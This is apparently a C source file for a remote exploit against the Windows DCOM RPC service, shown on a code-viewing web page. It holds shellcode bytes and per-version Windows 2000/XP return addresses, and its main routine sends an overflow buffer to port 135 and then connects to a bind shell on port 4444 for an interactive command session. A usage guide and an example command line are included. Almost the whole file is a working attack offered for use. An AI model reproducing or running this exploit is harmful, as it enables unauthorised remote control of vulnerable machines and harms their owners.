📄 dcomrpc_magickey_win.c
字号:
0xeb,0x05,0xe8,0xe2,0xff,0xff,0xff,0x03,
0x53,0x06,0x1f,0x74,0x57,0x75,0x95,0x80,
0xbf,0xbb,0x92,0x7f,0x89,0x5a,0x1a,0xce,
0xb1,0xde,0x7c,0xe1,0xbe,0x32,0x94,0x09,
0xf9,0x3a,0x6b,0xb6,0xd7,0x9f,0x4d,0x85,
0x71,0xda,0xc6,0x81,0xbf,0x32,0x1d,0xc6,
0xb3,0x5a,0xf8,0xec,0xbf,0x32,0xfc,0xb3,
0x8d,0x1c,0xf0,0xe8,0xc8,0x41,0xa6,0xdf,
0xeb,0xcd,0xc2,0x88,0x36,0x74,0x90,0x7f,
0x89,0x5a,0xe6,0x7e,0x0c,0x24,0x7c,0xad,
0xbe,0x32,0x94,0x09,0xf9,0x22,0x6b,0xb6,
0xd7,0x4c,0x4c,0x62,0xcc,0xda,0x8a,0x81,
0xbf,0x32,0x1d,0xc6,0xab,0xcd,0xe2,0x84,
0xd7,0xf9,0x79,0x7c,0x84,0xda,0x9a,0x81,
0xbf,0x32,0x1d,0xc6,0xa7,0xcd,0xe2,0x84,
0xd7,0xeb,0x9d,0x75,0x12,0xda,0x6a,0x80,
0xbf,0x32,0x1d,0xc6,0xa3,0xcd,0xe2,0x84,
0xd7,0x96,0x8e,0xf0,0x78,0xda,0x7a,0x80,
0xbf,0x32,0x1d,0xc6,0x9f,0xcd,0xe2,0x84,
0xd7,0x96,0x39,0xae,0x56,0xda,0x4a,0x80,
0xbf,0x32,0x1d,0xc6,0x9b,0xcd,0xe2,0x84,
0xd7,0xd7,0xdd,0x06,0xf6,0xda,0x5a,0x80,
0xbf,0x32,0x1d,0xc6,0x97,0xcd,0xe2,0x84,
0xd7,0xd5,0xed,0x46,0xc6,0xda,0x2a,0x80,
0xbf,0x32,0x1d,0xc6,0x93,0x01,0x6b,0x01,
0x53,0xa2,0x95,0x80,0xbf,0x66,0xfc,0x81,
0xbe,0x32,0x94,0x7f,0xe9,0x2a,0xc4,0xd0,
0xef,0x62,0xd4,0xd0,0xff,0x62,0x6b,0xd6,
0xa3,0xb9,0x4c,0xd7,0xe8,0x5a,0x96,0x80,
0xae,0x6e,0x1f,0x4c,0xd5,0x24,0xc5,0xd3,
0x40,0x64,0xb4,0xd7,0xec,0xcd,0xc2,0xa4,
0xe8,0x63,0xc7,0x7f,0xe9,0x1a,0x1f,0x50,
0xd7,0x57,0xec,0xe5,0xbf,0x5a,0xf7,0xed,
0xdb,0x1c,0x1d,0xe6,0x8f,0xb1,0x78,0xd4,
0x32,0x0e,0xb0,0xb3,0x7f,0x01,0x5d,0x03,
0x7e,0x27,0x3f,0x62,0x42,0xf4,0xd0,0xa4,
0xaf,0x76,0x6a,0xc4,0x9b,0x0f,0x1d,0xd4,
0x9b,0x7a,0x1d,0xd4,0x9b,0x7e,0x1d,0xd4,
0x9b,0x62,0x19,0xc4,0x9b,0x22,0xc0,0xd0,
0xee,0x63,0xc5,0xea,0xbe,0x63,0xc5,0x7f,
0xc9,0x02,0xc5,0x7f,0xe9,0x22,0x1f,0x4c,
0xd5,0xcd,0x6b,0xb1,0x40,0x64,0x98,0x0b,
0x77,0x65,0x6b,0xd6,0x93,0xcd,0xc2,0x94,
0xea,0x64,0xf0,0x21,0x8f,0x32,0x94,0x80,
0x3a,0xf2,0xec,0x8c,0x34,0x72,0x98,0x0b,
0xcf,0x2e,0x39,0x0b,0xd7,0x3a,0x7f,0x89,
0x34,0x72,0xa0,0x0b,0x17,0x8a,0x94,0x80,
0xbf,0xb9,0x51,0xde,0xe2,0xf0,0x90,0x80,
0xec,0x67,0xc2,0xd7,0x34,0x5e,0xb0,0x98,
0x34,0x77,0xa8,0x0b,0xeb,0x37,0xec,0x83,
0x6a,0xb9,0xde,0x98,0x34,0x68,0xb4,0x83,
0x62,0xd1,0xa6,0xc9,0x34,0x06,0x1f,0x83,
0x4a,0x01,0x6b,0x7c,0x8c,0xf2,0x38,0xba,
0x7b,0x46,0x93,0x41,0x70,0x3f,0x97,0x78,
0x54,0xc0,0xaf,0xfc,0x9b,0x26,0xe1,0x61,
0x34,0x68,0xb0,0x83,0x62,0x54,0x1f,0x8c,
0xf4,0xb9,0xce,0x9c,0xbc,0xef,0x1f,0x84,
0x34,0x31,0x51,0x6b,0xbd,0x01,0x54,0x0b,
0x6a,0x6d,0xca,0xdd,0xe4,0xf0,0x90,0x80,
0x2f,0xa2,0x04,0x00
};
struct os_plat_pk
{
int op_pk_num;
char *op_pk_str;
u_long retloc_jmp_esp;
};
struct os_plat_pk __pt_pkg_form[]=
{
{0,"Windows 2000 magic version 1",0x0018759F},
{1,"Windows 2000 magic version 2",0x001875E3},
{2,"Windows 2000 magic version 3",0x001F0CD0},
{3,"Windows 2000 magic version 4",0x010016C6},
{4,"Windows 2000 magic version 5",0x010016CB},
{5,"[Win2k Universal]", 0x0018759F },
{6,"[WinXP Universal]", 0x0100139d },
{0x82,NULL,0}
};
#define DEF_STR "It's test"
#define DEF_BF (0x1000)
#define DEF_SZ (0xff)
#define GET_SZ (0x400)
int sexsock(char *conn_host_nm,int conn_port_nm);
void start_shell(int st_sock_va);
void re_connt_lm(int st_sock_va);
void pri_usg(char *f_nm);
void pri_banrl();
int main(int argc, char *argv[])
{
int sock,type_def=(0),r_r1,r_r2,whgl;
u_long retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
u_char get_bf[(DEF_BF)],atk_bf[(DEF_BF)];
char def_host[(DEF_SZ)]=(DEF_STR);
//Lordy UP
unsigned short port_connect = 135;
unsigned short port_back = 4444;
(void)pri_banrl();
while((whgl=getopt(argc,argv,"T:t:H:h:P:p:B:b:I:i"))!=EOF)
{
switch(whgl)
{
case 'T':
case 't':
if((type_def=atoi(optarg))>6)
{
(void)pri_usg(argv[0]);
}
else retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
break;
case 'H':
case 'h':
memset((char *)def_host,0,sizeof(def_host));
strncpy(def_host,optarg,sizeof(def_host)-1);
break;
case 'P':
case 'p':
port_connect=atoi(optarg);
break;
case 'B':
case 'b':
port_back=atoi(optarg);
break;
case 'I':
case 'i':
(void)pri_usg(argv[0]);
break;
case '?':
(void)pri_usg(argv[0]);
break;
}
}
if(strstr(def_host,(DEF_STR)))
{
(void)pri_usg(argv[0]);
}
fprintf(stdout," [*] Target: %s.\n",__pt_pkg_form[type_def].op_pk_str);
fprintf(stdout," [0] Add return address.\n");
memcpy((u_char *)shellcode+36,(u_char *)&retloc_jmp_esp,4);
fprintf(stdout," [1] Start, shellcode setting.\n");
memcpy((u_char *)atk_bf,request1,sizeof(request1));
r_r1=sizeof(request1);
r_r2=sizeof(shellcode)/2;
#define QIK_SHIFT(v,x,l) *(u_long *)(v+x)=*(u_long *)(v+x)+l
QIK_SHIFT(request2,0,r_r2);
QIK_SHIFT(request2,8,r_r2);
memcpy((u_char *)atk_bf+r_r1,request2,sizeof(request2));
r_r1+=sizeof(request2);
memcpy((u_char *)atk_bf+r_r1,shellcode,sizeof(shellcode));
r_r1+=sizeof(shellcode);
memcpy((u_char *)atk_bf+r_r1,request3,sizeof(request3));
r_r1+=sizeof(request3);
memcpy((u_char *)atk_bf+r_r1,request4,sizeof(request4));
r_r1+=sizeof(request4);
r_r2=sizeof(shellcode)-12;
QIK_SHIFT(atk_bf,8,r_r2);
QIK_SHIFT(atk_bf,16,r_r2);
QIK_SHIFT(atk_bf,128,r_r2);
QIK_SHIFT(atk_bf,132,r_r2);
QIK_SHIFT(atk_bf,180,r_r2);
QIK_SHIFT(atk_bf,184,r_r2);
QIK_SHIFT(atk_bf,208,r_r2);
QIK_SHIFT(atk_bf,396,r_r2);
fprintf(stdout," [2] Trying %s:%i ...\n",def_host,port_connect);
sock=(int)sexsock(def_host,port_connect);
(void)re_connt_lm(sock);
fprintf(stdout," [3] Connected to %s:%i.\n",def_host,port_connect);
send(sock,bindstr,sizeof(bindstr),0);
recv(sock,get_bf,sizeof(get_bf),0);
fprintf(stdout," [4] Send, attack code.\n");
send(sock,atk_bf,r_r1,0);
close(sock);
fprintf(stdout," [5] OK, Trying %s:%i ...\n",def_host,port_back);
fprintf(stdout," [*] Waiting, cmd shell ");
fflush(stdout);
Sleep(1);
fprintf(stdout,".");
fflush(stdout);
Sleep(1);
fprintf(stdout,".");
fflush(stdout);
Sleep(1);
fprintf(stdout,".\n");
sock=(int)sexsock(def_host,port_back);
(void)re_connt_lm(sock);
(void)start_shell(sock);
exit(0);
}
int sexsock(char *conn_host_nm,int conn_port_nm)
{
WSADATA wsdata;
int sock;
unsigned long ip;
struct sockaddr_in sxp_addr;
if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) {
printf("[x] WSAStartup error...\n");
WSACleanup();
return(-1);
}
//printf("[+] Initialize WSAStartup - OK\n");
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{
perror(" [-] socket() error");
return(-1);
}
//printf("[*] Socket initialized - OK\n");
ip=gimmeip(conn_host_nm);
sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons((SHORT)conn_port_nm);
sxp_addr.sin_addr.s_addr=ip;
bzero(&(sxp_addr.sin_zero),8);
if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)
{
perror(" [-] connect() error");
return(-1);
}
return(sock);
}
void start_shell(int sock){
int l;
char buf[1000];
struct timeval time;
unsigned long ul[2];
time.tv_sec=RECVTIMEOUT;
time.tv_usec=0;
while (1) {
ul[0]=1;
ul[1]=sock;
l=select(0,(fd_set *)&ul,NULL,NULL,&time);
if(l==1) {
l=recv(sock,buf,sizeof(buf),0);
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
l=write(1,buf,l);
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
}
else {
l=read(0,buf,sizeof(buf));
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
l=send(sock,buf,l,0);
if (l<=0) {
printf("[x] Connection closed.\n");
return;
}
}
}
}
void re_connt_lm(int st_sock_va)
{
if(st_sock_va==-1)
{
fprintf(stdout," [-] Failed.\n\n");
fprintf(stdout," Happy Exploit ! :-)\n\n");
exit(-1);
}
}
void pri_usg(char *f_nm)
{
int r_rn=0;
fprintf(stdout," Usage: %s -option [argument]\n\n",f_nm);
fprintf(stdout,"\t -h [hostname] - target host.\n");
fprintf(stdout,"\t -p [port to connect] - port to connect in the target, default 135.\n");
fprintf(stdout,"\t -b [port to connect back] - port to bind the shell, default 4444.\n");
fprintf(stdout,"\t -t [number] - select target number.\n\n");
fprintf(stdout," Select target number>\n\n");
for(;;)
{
if(__pt_pkg_form[r_rn].op_pk_num==(0x82))
break;
else
{
fprintf(stdout,"\t {%d} %s\n",__pt_pkg_form[r_rn].op_pk_num,__pt_pkg_form[r_rn].op_pk_str);
}
r_rn++;
}
fprintf(stdout,"\n Exmaple> %s -h 192.168.0.1 -t3 -p135 -b3333\n\n",f_nm);
exit(0);
}
void pri_banrl()
{
fprintf(stdout,"\n DCOM RPC WIN32 remote exploit by Lordy - Lordillusions Company(C)\n(Most languages)\n\n");
}
/* eox */
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -